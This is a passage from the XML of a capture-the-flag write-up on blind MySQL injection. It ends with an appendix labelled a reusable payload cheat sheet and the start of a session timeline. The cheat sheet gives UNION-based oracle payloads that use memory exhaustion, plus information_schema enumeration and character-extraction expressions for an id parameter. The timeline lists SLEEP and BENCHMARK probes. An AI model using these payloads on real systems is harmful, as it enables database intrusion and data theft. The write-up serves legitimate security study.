        </w:rPr>
        <w:t xml:space="preserve">. Response length, error v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">erbosity, cache behavior, connection resets, and crash reports are all channels, and a defense is only complete when every channel an attacker can reach has been measured and closed or, better, when the injection itself has been eliminated at the source.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100016" w:name="_Toc100016"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100016"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100017" w:name="_Toc100017"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Appendix A: Payload Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100017"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The complete payload set used during the solve, in the form most convenient for reuse. All payloads are URL-encoded into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET parameter; the row-generator subquery is abbreviated as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">{MANY}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and expands to the 800-row cartesian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> join shown in Listing 3.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 6: Payload cheat sheet</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="7fa98c"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- boolean oracle (TRUE = fatal, FALSE = normal body)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 UNION ALL SELECT REPEAT('A', IF((&lt;cond&gt;), 400000, 1)) FROM {MANY} z</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="7fa98c"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- byte-value oracle (value = round(tried_to_allocate / 400000))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 UNION ALL SELECT REPEAT('A', ((&lt;numeric-expr&gt;) * 400000)) FROM {MANY} z</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="7fa98c"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- enumeration expressions fed to the oracle</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  WHERE TABLE_SCHEMA=DATABASE())</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  WHERE TABLE_NAME='&lt;t&gt;' AND TABLE_SCHEMA=DATABASE())</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(SELECT GROUP_CONCAT(flag) FROM flag)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="7fa98c"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- length, 3 requests, max row 4.4 MB</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">((LENGTH(&lt;expr&gt;) DIV 100) MOD 10)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">((LENGTH(&lt;expr&gt;) DIV 10) MOD 10)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(LENGTH(&lt;expr&gt;) MOD 10)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="7fa98c"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-- character, 1 request</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ASCII(SUBSTR((&lt;expr&gt;), &lt;pos&gt;, 1))</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100018" w:name="_Toc100018"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Appendix B: Session Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100018"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The full session, from first recon to verified flag, compressed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> into nine stages. Note how much of the timeline is disciplined dead-ending: the breakthrough only came after the timing channel was exhaustively and negatively characterized, which is precisely what made the memory oracle's design constraints obvious.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5: Session timeline</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="c5d8d0" w:sz="1" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="800" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Stage</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Action</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Outcome</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Recon</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fetched page, read self-highlighted source</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirmed deployed code identical to sample.php</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Probe</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP(3/6/10/18)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BENCHMARK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IF()</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Flat 2.21 s - statement killer discovered</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Bypass attempt</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FOR UPDATE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FOR SHARE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INTO @a</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">All flat - timing channel declared dead</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Probe</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
